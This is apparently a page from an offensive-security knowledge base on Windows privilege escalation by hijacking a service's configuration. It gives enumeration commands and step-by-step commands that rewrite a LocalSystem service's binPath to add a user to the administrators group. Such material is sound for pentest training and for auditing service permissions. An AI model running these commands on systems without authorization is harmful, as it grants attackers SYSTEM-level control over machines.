Operator On The Wire
← Back to Knowledge Base
OOTW / Chapter II - Local / 04. Windows / 02. Privilege Escalation / Service Hijacking

Service Configuration Hijack

Service configuration hijacking abuses the ability to change a service command line. The common target is binPath, which tells the Service Control Manager what to execute when the service starts.

The primitive is direct service reconfiguration. If the service runs as LocalSystem, a low-privileged user with service change rights can execute a command as SYSTEM on the next service start.

When enumerating service configuration hijack opportunities, try to identify:

  • Current user has SERVICE_CHANGE_CONFIG
  • Service runs as LocalSystem or another privileged account
  • Current user can restart the service
  • Original BINARY_PATH_NAME
  • Whether the service can tolerate a failed start

Enumeration

Inspect the service:

sc qc <ServiceName>

Check weak service permissions:

accesschk64.exe /accepteula -quvcw <ServiceName>

Check whether the service can be stopped and started:

sc query <ServiceName>
sc sdshow <ServiceName>

Interesting findings include:

  • BINARY_PATH_NAME points to a privileged service binary
  • SERVICE_START_NAME is LocalSystem
  • Current user can change service config
  • Current user can restart the service

Once configuration control is confirmed, the service command line can be replaced with a one-shot command or payload path.

Exploit

  1. Record the original service configuration.
sc qc <ServiceName>
  1. Modify the service binary path to run a command.
sc config <ServiceName> binPath= "C:\Windows\System32\cmd.exe /c net localgroup administrators <user> /add"
  1. Restart the service.
sc stop <ServiceName>
sc start <ServiceName>

The service may return an error because cmd.exe is not a real service binary. The command can still execute before the Service Control Manager reports failure.

  1. Confirm the result.
net localgroup administrators
  1. Start a fresh logon session if group membership was changed.
klist purge

Sign out and back in, or create a new session so the new group membership appears in the token.